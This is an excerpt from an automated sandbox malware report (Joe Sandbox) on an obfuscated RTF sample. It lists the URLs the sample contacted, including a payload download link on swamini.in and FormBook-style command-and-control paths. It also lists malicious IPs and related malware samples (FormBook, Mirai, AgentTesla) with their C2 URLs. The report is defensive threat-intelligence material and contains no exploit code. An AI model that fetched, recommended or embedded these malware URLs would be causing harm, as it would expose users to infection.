http://www.www32561b.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.guimisha.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.allamericanshuttlellc.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.6061k.vip/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.albertcolet.com/t2ti/www.guimisha.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.6061k.vip/t2ti/www.xazeyu.net | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://swamini.in/ | EQNEDT32.EXE, 00000002.00000002.354183793.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354079033.00000000002E5000.00000004.00000020.00020000.00000000.sdmp | false | 14%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.ssongg10292.cfdReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.techsterverse.life/t2ti/www.www32561b.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.guimisha.com/t2ti/www.ssongg10292.cfd | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.hhmhhhbh.xyz/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: phishing | unknown
http://www.shucaimh.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fxzx01.icuReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ssongg10292.cfd | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC: | EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.autoitscript.com/autoit3 | explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.spacecargo.net/t2ti/www.michealwilshire.online | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.alishopogolic.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.guimisha.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hhmhhhbh.xyzReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC: | EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exej | EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.michealwilshire.online/t2ti/www.janenas.top | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.piriform.com/ccleanerxe | explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.allamericanshuttlellc.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.maquibotanic.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.janenas.topReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.6061k.vipReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp:// | explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.www32561b.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://zz.bdstatic.com/linksubmit/push.js | explorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmp | false |  | high
http://www.xazeyu.net | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.albertcolet.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fxzx01.icu/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.spacecargo.netReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.dr | false |  | high
http://www.techsterverse.life/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.xazeyu.netReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shucaimh.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.fxzx01.icu/t2ti/www.albertcolet.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://java.sun.com | explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.www32561b.com/t2ti/www.spacecargo.net | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.spacecargo.net/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_Errorword.exe | word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.dr | false |  | high
http://www.6061k.vip | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.janenas.top | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.albertcolet.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.alishopogolic.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.maquibotanic.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.techsterverse.life | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.alishopogolic.com/t2ti/www.maquibotanic.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.guimisha.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | explorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.www32561b.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org | explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.michealwilshire.online/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.ssongg10292.cfd/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.alishopogolic.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.fxzx01.icu | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.ssongg10292.cfd/t2ti/www.hhmhhhbh.xyz | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.150.181.71 | www.xazeyu.net | unknown |  | 138538 | NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | true
3.33.130.190 | 6061k.vip | United States |  | 8987 | AMAZONEXPANSIONGB | true
107.164.111.101 | www.shucaimh.com | United States |  | 18779 | EGIHOSTINGUS | true
103.224.247.210 | swamini.in | India |  | 133295 | WEBWERKS-ASWebWerksIndiaPvtLtdIN | true
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1345774
Start date and time: 2023-11-21 13:25:07 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
Detection: MAL
Classification: mal100.troj.expl.evad.winRTF@429/12@5/4
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 137
• Number of non-executed functions: 159
Cookbook Comments:
• Found application associated with file extension: .rtf
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Override analysis time to 80123.9603681394 for current running targets taking high CPU consumption
• Override analysis time to 160247.920736279 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 8.249.223.254, 8.249.225.254, 8.252.65.254, 8.252.81.126, 8.249.243.254, 72.21.81.240
• Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Execution Graph export aborted for target EQNEDT32.EXE, PID 1668 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                        Time | Type | Description
                                        13:25:52 | API Interceptor | 360x Sleep call for process: EQNEDT32.EXE modified
                                        13:25:58 | API Interceptor | 29x Sleep call for process: twbcaze.exe modified
                                        13:26:00 | API Interceptor | 684884x Sleep call for process: explorer.exe modified
                                        13:26:03 | API Interceptor | 12281021x Sleep call for process: cmstp.exe modified
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        103.150.181.71 | FAT_-_0035.exe | malicious | FormBook, NSISDropper | www.weixinrobots.com/b0y4/?mDKDR=5jOtvl80J6pPfLo&bV2=iWzdtdOUr3WyESEtDtxmXiSYMZp4K2MhDFOUgWW4Xkn4P0jVRWhckfA3XwpZsOG/LFi3
                                        3.33.130.190 | Confirma.exe | malicious | FormBook | www.canadiantrafficmanagement.net/he2a/?c6Z=q6al5R7x&9rIdTlI=8QFQCqD9FRlMZfde71PklYjLEob+si+Y9aKcIwfPHn9Ij3TA880ZABCw2tr5vOD0Poxe
                                        3.33.130.190 | Nuevo_orden_pdf.exe | malicious | FormBook | www.awra.app/m0d5/?3f2t_LnX=hiUfbT9yhpJi+bcQh0jRPY3Wl7eZj/T4te/gMgaWTw1FmjvAcJpk9Hnme9R0LWkJMCKRHAomNg==&cp=YPMlNpnpz
                                        3.33.130.190 | Payment_$5,860.exe | malicious | FormBook, NSISDropper | www.truepanthersecurity.info/st58/?Cj=fAqS/1aKGrYljxpbu4X6H2aQdB0I7R8hcCOST+4zDPZSvo6QLnJC4z9ezIabo8sXkPtY&Kzr=lHF49jH
                                        3.33.130.190 | PO#11231270.doc | malicious | FormBook | www.elohiyminfotech.com/pui9/?Ftx=GcObd50+d4jDDNbr1PdCqLXjzhg6LOLbb5/IEp8vuKpL/fluFMlT9AyGIQfRapZ3d1HsnQ==&pFQtB=grvhL8lhxXPp
                                        3.33.130.190 | ekstre.exe | malicious | FormBook, GuLoader | www.vastfew.com/ay62/?N2MpwJo=GeKgvGHevWBAn+maQ59oXcZbLyVfsEOAUsIdsvGlzObY1CA72B+o44RVxGxsyTu8sw9Z&NN90b=nXLdQB9p1nAdvbPp
                                        3.33.130.190 | 9008654324456.exe | malicious | FormBook | www.thelakahealth.com/ao65/?DlS=gX6nrNea7JPxmwviOkA4KSw4hGBEIcWikOJPOCdqHMmRSxLokgSfXw86lphfVMxxzfue&P2J=0nMX8h7
                                        3.33.130.190 | cRmu9LROM09hq1F.exe | malicious | FormBook | www.mrsearthphilippines.com/fadc/?ArQ=xR8gpuhlPV8SDnMF1EpA5rnikjCsmPdm8o8xgOC599NS+umfnF8dhOErF6UDZFfmUFFp&-Zv=ahuD9pip12jLJXo
                                        3.33.130.190 | RFQ-T56797W_1.xlsx | malicious | FormBook, NSISDropper | www.centralngs.com/ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41
                                        3.33.130.190 | Confirmation!!.exe | malicious | FormBook | www.canadiantrafficmanagement.net/he2a/?9rNP-n=8QFQCqCJFxg8EvAqnFPklYjLEob+si+Y9aKcIwfPHn9Ij3TA880ZABCw2t/T6eD3N/xe&2d=K8oTebaH
                                        3.33.130.190 | Order_QR-00658.exe | malicious | FormBook, NSISDropper | www.riseupwithpaiges.com/st58/?uX=lf5X&TxlL=gUKQ65KeJ5i7Ce2D3FiDlp1E3fkwW/hcbnBIeh92PGVXj7fPNwEFLJ29uF5Ndq/xYSnYssLNHA==
                                        3.33.130.190 | 1451__TrogeShippingSchedule.doc | malicious | FormBook | www.medicalspacelocators.com/fs35/?dv24o=sRK8IkSfsErkPQnlPbO1qZyUPsbwAj+otqHi7ZjosrRYcrfc1O7jF7WWLGWHv2HvZcy8OA==&NtPHFj=MrAxW
                                        3.33.130.190 | wM34vVyJ6k.exe | malicious | FormBook | www.natsellsatl.com/bp31/
                                        3.33.130.190 | Quotation.xls | malicious | FormBook | www.lynktag.com/bp31/
                                        3.33.130.190 | THP-20381508-2023NP.exe | malicious | FormBook, NSISDropper | www.truepanthersecurity.info/st58/?vT=fAqS/1aKGrYljxpbu4X6H2aQdB0I7R8hcCOST+4zDPZSvo6QLnJC4z9ezIaikdAU1fMf&S2M8J8=RdEHspH0oFo8
                                        3.33.130.190 | Invoice_&_Banking_details.exe | malicious | FormBook | www.teambaddiesent.com/o11y/?Jv1=ZVU+TFHYC94w20+VuauFbc5mAHki4wXr17NQhqU5+T20CS96TKuoHk4ArrdfPppLZitG&I6k=4hIxBFAhePdLi
                                        3.33.130.190 | Factura_de_proforma_pdf.exe | malicious | DBatLoader, FormBook | www.vivanenergy.com/ed09/?Unj=NcWzkpVrfNqMm41eN7UpMV1Z1pj7g082Ul7Kosu7yp8Tgq2wSTWTECFhfFgJ/Aytv/Qg&UR-4=D8OtmpYpTP
                                        3.33.130.190 | Receipt_91888_PDF.exe | malicious | FormBook | www.misstamar.mobi/he2a/?Ej=+ndrpoqJBkrx/AVrk4daYrXANuq9Wk84J7BJkdqIrMZVv9dYaOHvLvMiox9ALFSPbd/T&ohPd=S8q0RfV
                                        3.33.130.190 | BB879OMOJHH.exe | malicious | FormBook | www.misstamar.mobi/he2a/?wVM=+ndrpoqJBkrx/AVrk4daYrXANuq9Wk84J7BJkdqIrMZVv9dYaOHvLvMioxpPQw2xcv7e&lXN=O0GHFhn0BPplp
                                        3.33.130.190 | Confirmation_receipt_PDF.exe | malicious | FormBook | www.misstamar.mobi/he2a/?nN=8pNTU&Bpg=+ndrpoqJBkrx/AVrk4daYrXANuq9Wk84J7BJkdqIrMZVv9dYaOHvLvMioyFpXxKJROaF7QcPCA==
                                        3.33.130.190 | svcVJ3Ljwp.exe | malicious | FormBook, NSISDropper | www.fakeittilyoumakeitfinance.com/ge06/?Lv6d=LPwSOSBVc8ythlOnIQFj4MKZD6dv3TVhpdJLV6eyESk7PzOWXbKoEYS1k0BoAfdBpGEk&VPK0i=xN9LEhVxD
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        swamini.in | NEWREST_Procurement.xlsx | malicious | Unknown | 103.224.247.210
                                        swamini.in | sYfKrBVpjn.xlsx | malicious | FormBook, NSISDropper | 103.224.247.210
                                        swamini.in | Quote_EXW..xlsx | malicious | FormBook, NSISDropper | 103.224.247.210
                                        swamini.in | Oder_S65392.xlsx | malicious | AgentTesla, NSISDropper | 103.224.247.210
                                        swamini.in | COFCO-INV231122_Balancepaymentnotice.doc | malicious | AveMaria, UACMe | 103.224.247.210
                                        swamini.in | TN81804BM_Production.doc | malicious | FormBook, NSISDropper | 103.224.247.210
                                        swamini.in | Inquiry-IND23072113.doc | malicious | AgentTesla | 103.224.247.210
                                        swamini.in | 310036_for_Production_Requirement.doc | malicious | FormBook, NSISDropper | 103.224.247.210
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        EGIHOSTINGUS | Iqgbhvnaowuspb.exe | malicious | DBatLoader, FormBook | 104.164.179.89
                                        EGIHOSTINGUS | SecuriteInfo.com.Win32.PWSX-gen.31207.26757.exe | malicious | FormBook | 104.164.179.89
                                        EGIHOSTINGUS | G1vp1p1HjW.elf | malicious | Mirai | 142.253.14.166
                                        EGIHOSTINGUS | GiRCyG58ws.elf | malicious | Mirai | 205.164.20.225
                                        EGIHOSTINGUS | xpQJmpNCvU.elf | malicious | Unknown | 142.111.153.23
                                        EGIHOSTINGUS | Faktura_proformasi.exe | malicious | FormBook | 104.164.179.89
                                        EGIHOSTINGUS | 9008654324456.exe | malicious | FormBook | 172.120.78.81
                                        EGIHOSTINGUS | m2cI5nJYUI.exe | malicious | Amadey, Phonk Miner, RedLine, SectopRAT, zgRAT | 192.177.75.157
                                        EGIHOSTINGUS | skid.x86.elf | malicious | Mirai, Moobot | 172.120.223.194
                                        EGIHOSTINGUS | eKlJmvs8k7.exe | malicious | FormBook | 104.253.249.45
                                        EGIHOSTINGUS | Confirmarea_comenzii.exe | malicious | DBatLoader, FormBook | 104.164.179.35
                                        EGIHOSTINGUS | SrGKzf5pYf.exe | malicious | FormBook | 104.164.69.183
                                        EGIHOSTINGUS | 1u31ptQsf6.elf | malicious | Okiru | 107.187.182.30
                                        EGIHOSTINGUS | SecuriteInfo.com.Win32.TrojanX-gen.27173.29057.exe | malicious | Unknown | 23.230.0.173
                                        EGIHOSTINGUS | SecuriteInfo.com.Win32.TrojanX-gen.27173.29057.exe | malicious | Unknown | 23.230.0.173
                                        EGIHOSTINGUS | bHFZDHNHZw.elf | malicious | Mirai | 45.39.143.28
                                        EGIHOSTINGUS | JLavGK0bZb.exe | malicious | FormBook | 104.164.141.70
                                        EGIHOSTINGUS | JndPQJ5g1P.elf | malicious | Unknown | 172.121.77.102
                                        EGIHOSTINGUS | arm7.elf | malicious | Mirai | 166.93.117.92
                                        EGIHOSTINGUS | xd.x86.elf | malicious | Mirai | 107.165.1.151
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | sora.x86.elf | malicious | Mirai | 103.133.185.146
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | sora.arm7.elf | malicious | Mirai | 103.133.185.134
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | a0JDLTs0LS.elf | malicious | Mirai, RapperBot | 103.133.185.145
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | FAT_-_0035.exe | malicious | FormBook, NSISDropper | 103.150.181.71
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | uMcp66r8xm.elf | malicious | Mirai | 103.99.44.7
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | jinx.arm7.elf | malicious | Unknown | 103.140.228.51
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | elasqyvohu.exe | malicious | Unknown | 103.150.181.176
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | MZbxLJqYM3.elf | malicious | Mirai | 103.133.185.156
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | B8BuahzlPU | malicious | Mirai | 103.133.185.145
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | V1yRZzzjuJ | malicious | Unknown | 103.133.185.151
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | QRJCdtkHy6 | malicious | Mirai | 103.133.185.115
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | eBEMdu87IG | malicious | Mirai | 103.133.185.144
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | vLqyyo55oA | malicious | Gafgyt Mirai | 103.133.185.142
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe | malicious | FormBook | 103.113.95.99
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | VHWXOeJWKF | malicious | Mirai | 103.133.185.119
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | sq9aBtcak6.exe | malicious | FormBook | 103.145.39.195
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN | mixazed.exe | malicious | GoBrut | 103.113.92.10
                                        AMAZONEXPANSIONGB | Confirma.exe | malicious | FormBook | 3.33.130.190
                                        AMAZONEXPANSIONGB | Nuevo_orden_pdf.exe | malicious | FormBook | 3.33.130.190
                                        AMAZONEXPANSIONGB | Payment_$5,860.exe | malicious | FormBook, NSISDropper | 3.33.130.190
                                        AMAZONEXPANSIONGB | PO#11231270.doc | malicious | FormBook | 3.33.130.190
                                        AMAZONEXPANSIONGB | https://rjtlawfirm.sharefile.com/d-3e8cb5040ece40a0 | malicious | HTMLPhisher | 3.33.222.159
                                        AMAZONEXPANSIONGB | https://att-yahoo-107847.weeblysite.com/ | malicious | Unknown | 3.33.220.150
                                        AMAZONEXPANSIONGB | https://rjtlawfirm.sharefile.com/d-9543a8d6e3f84daf | malicious | HTMLPhisher | 3.33.222.159
